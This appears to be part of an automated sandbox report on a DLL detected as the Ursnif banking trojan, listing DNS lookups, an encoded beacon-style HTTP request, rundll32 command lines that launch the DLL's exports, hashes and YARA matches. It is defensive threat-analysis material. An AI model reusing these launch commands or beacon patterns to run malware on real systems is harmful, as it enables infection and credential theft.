                                    Jul 9, 2021 15:24:34.399265051 CEST8.8.8.8192.168.2.30xa524No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                    Jul 9, 2021 15:24:34.399265051 CEST8.8.8.8192.168.2.30xa524No error (0)outlook.ms-acdc.office.comZRH-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                    Jul 9, 2021 15:24:34.399265051 CEST8.8.8.8192.168.2.30xa524No error (0)ZRH-efz.ms-acdc.office.com52.97.201.194A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:34.399265051 CEST8.8.8.8192.168.2.30xa524No error (0)ZRH-efz.ms-acdc.office.com52.97.186.146A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:34.399265051 CEST8.8.8.8192.168.2.30xa524No error (0)ZRH-efz.ms-acdc.office.com52.97.186.114A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:34.399265051 CEST8.8.8.8192.168.2.30xa524No error (0)ZRH-efz.ms-acdc.office.com52.97.201.210A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • outlook.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.34972940.97.128.19480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 9, 2021 15:24:33.634449005 CEST1321OUTGET /jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crw HTTP/1.1
                                    Accept: text/html, application/xhtml+xml, image/jxr, */*
                                    Accept-Language: en-US
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                    Accept-Encoding: gzip, deflate
                                    Host: outlook.com
                                    Connection: Keep-Alive
                                    Jul 9, 2021 15:24:33.761584997 CEST1322INHTTP/1.1 301 Moved Permanently
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Location: https://outlook.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crw
                                    Server: Microsoft-IIS/10.0
                                    request-id: ae6a76ce-6de3-1bc0-a54d-4b3cc446f95e
                                    X-FEServer: DM5PR2201CA0020
                                    X-RequestId: 75af693c-32c0-4f49-a3d1-8caa8be9ee47
                                    X-Powered-By: ASP.NET
                                    X-FEServer: DM5PR2201CA0020
                                    Date: Fri, 09 Jul 2021 13:24:33 GMT
                                    Connection: close
                                    Content-Length: 0


                                    Code Manipulations

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: loaddll32.exe PID: 4796 Parent PID: 5532

                                    General

                                    Start time:15:23:10
                                    Start date:09/07/2021
                                    Path:C:\Windows\System32\loaddll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:loaddll32.exe 'C:\Users\user\Desktop\c36.dll'
                                    Imagebase:0x970000
                                    File size:116736 bytes
                                    MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                    Reputation:high

                                    Analysis Process: cmd.exe PID: 1636 Parent PID: 4796

                                    General

                                    Start time:15:23:10
                                    Start date:09/07/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
                                    Imagebase:0xbd0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Analysis Process: rundll32.exe PID: 1488 Parent PID: 4796

                                    General

                                    Start time:15:23:10
                                    Start date:09/07/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult
                                    Imagebase:0x11b0000
                                    File size:61952 bytes
                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Analysis Process: rundll32.exe PID: 1844 Parent PID: 1636

                                    General

                                    Start time:15:23:10
                                    Start date:09/07/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
                                    Imagebase:0x11b0000
                                    File size:61952 bytes
                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
                                    Reputation:high

                                    Analysis Process: rundll32.exe PID: 1632 Parent PID: 4796

                                    General

                                    Start time:15:23:15
                                    Start date:09/07/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\c36.dll,Division
                                    Imagebase:0x11b0000
                                    File size:61952 bytes
                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Analysis Process: rundll32.exe PID: 5520 Parent PID: 4796

                                    General

                                    Start time:15:23:19
                                    Start date:09/07/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor
                                    Imagebase:0x11b0000
                                    File size:61952 bytes
                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Analysis Process: rundll32.exe PID: 2616 Parent PID: 4796

                                    General

                                    Start time:15:23:24
                                    Start date:09/07/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose
                                    Imagebase:0x11b0000
                                    File size:61952 bytes
                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Analysis Process: iexplore.exe PID: 5468 Parent PID: 792

                                    General

                                    Start time:15:24:28
                                    Start date:09/07/2021
                                    Path:C:\Program Files\internet explorer\iexplore.exe
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                    Imagebase:0x7ff6d8670000
                                    File size:823560 bytes
                                    MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Analysis Process: iexplore.exe PID: 3008 Parent PID: 5468

                                    General

                                    Start time:15:24:29
                                    Start date:09/07/2021
                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2
                                    Imagebase:0x1170000
                                    File size:822536 bytes
                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Analysis Process: WerFault.exe PID: 1948 Parent PID: 1632

                                    General

                                    Start time:15:24:38
                                    Start date:09/07/2021
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852
                                    Imagebase:0x1110000
                                    File size:434592 bytes
                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis

                                    Reset < >